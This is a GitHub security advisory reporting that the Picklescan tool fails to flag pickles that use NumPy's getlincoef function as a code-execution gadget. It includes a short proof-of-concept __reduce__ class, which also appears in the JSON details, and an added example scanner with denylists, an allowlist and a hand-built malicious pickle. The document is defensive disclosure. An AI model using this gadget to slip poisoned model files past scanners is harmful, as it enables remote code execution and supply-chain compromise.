GHSA-RRXM-2PVV-M66X
Vulnerability from github – Published: 2025-12-30 15:18 – Updated: 2025-12-30 15:18
Summary
Picklescan is vulnerable to RCE via missing detection when calling numpy.f2py.crackfortran.getlincoef
Details
Summary
A malicious pickle can use the numpy.f2py.crackfortran.getlincoef function (a NumPy F2PY helper) to execute arbitrary Python code during unpickling, and Picklescan does not flag it.
Details
Picklescan fails to detect a malicious pickle that references the gadget numpy.f2py.crackfortran.getlincoef in __reduce__, allowing arbitrary command execution when the pickle is loaded. A crafted object returns this function plus attacker-controlled arguments; the scan reports the file as safe, but pickle.load() triggers execution.
PoC
```python
class PoC:
    def __reduce__(self):
        from numpy.f2py.crackfortran import getlincoef
        return getlincoef, ("__import__('os').system('whoami')", None)
```
Impact
- Arbitrary code execution on the victim machine once they load the “scanned as safe” pickle / model file.
- Affects any workflow relying on Picklescan to vet untrusted pickle / PyTorch artifacts.
- Enables supply‑chain poisoning of shared model files.
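As an added illustration (not Picklescan's own code, and not the project's detection logic) of why one missing denylist entry is a complete bypass, and what a default-deny alternative looks like, the following scanner walks a pickle's opcode stream with pickletools.genops without executing it, lists every global the file would import, and judges the list against a denylist (pre-fix and fixed variants) and against an allowlist. It also shows the pickle-docs pattern of an Unpickler whose find_class refuses anything outside the allowlist. The denylists, the allowlist and both sample pickles are constructed for this example; the malicious sample is hand-assembled from opcodes with a placeholder argument so it can be built and scanned without NumPy installed.

```python
import collections
import io
import pickle
import pickletools

# Denylists in the style a scanner like Picklescan keeps (constructed here).
# PRE_FIX lacks the gadget named in the advisory; FIXED carries it.
PRE_FIX_DENYLIST = frozenset({"os.system", "builtins.eval", "builtins.exec"})
FIXED_DENYLIST = PRE_FIX_DENYLIST | {"numpy.f2py.crackfortran.getlincoef"}

# Default-deny allowlist of exact module.name pairs a model file may reference.
# Assumed for this example; a real deployment tunes it to the formats it loads.
SAFE_GLOBALS = frozenset({"collections.OrderedDict"})

STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}


def extract_globals(data: bytes) -> list:
    """Statically list every module.name the pickle would import.

    pickletools.genops only parses opcodes and never executes the stream.
    GLOBAL carries 'module name' in its argument; STACK_GLOBAL (protocol 4+)
    takes module and name from the two most recently pushed strings, tracked
    here without simulating memo reuse (BINGET), which is enough for pickles
    written by the standard library pickler.
    """
    refs = []
    pushed_strings = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            refs.append(f"{module}.{name}")
        elif op.name == "STACK_GLOBAL":
            if len(pushed_strings) < 2:
                raise ValueError("STACK_GLOBAL without two preceding strings")
            refs.append(f"{pushed_strings[-2]}.{pushed_strings[-1]}")
        elif op.name in STRING_OPS:
            pushed_strings.append(arg)
    return refs


def scan(data: bytes, denylist=FIXED_DENYLIST, allowlist=SAFE_GLOBALS) -> dict:
    """Judge a file two ways: by denylist (where a miss is a bypass) and by allowlist."""
    refs = extract_globals(data)
    dangerous = [r for r in refs if r in denylist]
    unknown = [r for r in refs if r not in denylist and r not in allowlist]
    return {
        "globals": refs,
        "dangerous": dangerous,
        "unknown": unknown,
        "denylist_verdict": "DANGEROUS" if dangerous else "CLEAN",
        "allowlist_verdict": "DANGEROUS" if (dangerous or unknown) else "CLEAN",
    }


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that resolves only allowlisted globals (pattern from the pickle docs)."""

    def find_class(self, module, name):
        if f"{module}.{name}" in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def load_is_blocked(data: bytes) -> bool:
    """True if the default-deny loader refuses the file before any import happens."""
    try:
        AllowlistUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError:
        return True
    return False


# Constructed samples. The malicious one is assembled by hand from opcodes so it
# needs no NumPy to build; its argument is a placeholder, not the advisory's
# payload. Loaded with plain pickle.load it would call getlincoef(*args).
MALICIOUS_PICKLE = (
    b"\x80\x02"                                # PROTO 2
    b"cnumpy.f2py.crackfortran\ngetlincoef\n"  # GLOBAL numpy.f2py.crackfortran getlincoef
    b"("                                       # MARK
    b"Vplaceholder_argument\n"                 # UNICODE (placeholder)
    b"N"                                       # NONE
    b"t"                                       # TUPLE  -> ("placeholder_argument", None)
    b"R"                                       # REDUCE -> getlincoef(*args) at load time
    b"."                                       # STOP
)
BENIGN_PICKLE = pickle.dumps(collections.OrderedDict([("weights", [1, 2, 3])]), protocol=4)

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_PICKLE), ("benign", BENIGN_PICKLE)):
        print(label,
              "| pre-fix denylist:", scan(blob, PRE_FIX_DENYLIST)["denylist_verdict"],
              "| fixed denylist:", scan(blob)["denylist_verdict"],
              "| allowlist:", scan(blob)["allowlist_verdict"],
              "| safe loader blocks:", load_is_blocked(blob))
```

Run as a script it prints one line per sample: with the pre-fix denylist the malicious file scans CLEAN, exactly the advisory's failure mode, while the fixed denylist and the allowlist both report it DANGEROUS and the allowlist loader refuses it before touching numpy. The design point is that any denylist lags newly discovered gadgets, so a scanner verdict should be treated as a filter on top of an allowlisted loader (or a non-executable format such as safetensors), not as the sole control for untrusted model files.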
Credits
- ac0d3r (https://github.com/ac0d3r)
- Tong Liu (https://lyutoon.github.io), Institute of Information Engineering, CAS
Severity
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "picklescan"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.33"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-502",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-30T15:18:16Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nPicklescan uses the `numpy.f2py.crackfortran.getlincoef` function (a NumPy F2PY helper) to execute arbitrary Python code during unpickling.\n\n### Details\n\nPicklescan fails to detect a malicious pickle that uses the gadget `numpy.f2py.crackfortran.getlincoef` in `__reduce__`, allowing arbitrary command execution when the pickle is loaded. A crafted object returns this function plus attacker\u2011controlled arguments; the scan reports the file as safe, but pickle.load() triggers execution.\n\n### PoC\n```python\nclass PoC:\n def __reduce__(self):\n from numpy.f2py.crackfortran import getlincoef\n return getlincoef, (\"__import__(\u0027os\u0027).system(\u0027whoami\u0027)\", None)\n```\n\n### Impact\n\n- Arbitrary code execution on the victim machine once they load the \u201cscanned as safe\u201d pickle / model file.\n- Affects any workflow relying on Picklescan to vet untrusted pickle / PyTorch artifacts.\n- Enables supply\u2011chain poisoning of shared model files.\n\n### Credits\n- [ac0d3r](https://github.com/ac0d3r)\n- [Tong Liu](https://lyutoon.github.io), Institute of information engineering, CAS",
"id": "GHSA-rrxm-2pvv-m66x",
"modified": "2025-12-30T15:18:16Z",
"published": "2025-12-30T15:18:16Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-rrxm-2pvv-m66x"
},
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/pull/53"
},
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab"
},
{
"type": "PACKAGE",
"url": "https://github.com/mmaitre314/picklescan"
},
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Picklescan is vulnerable to RCE via missing detection when calling numpy.f2py.crackfortran.getlincoef"
}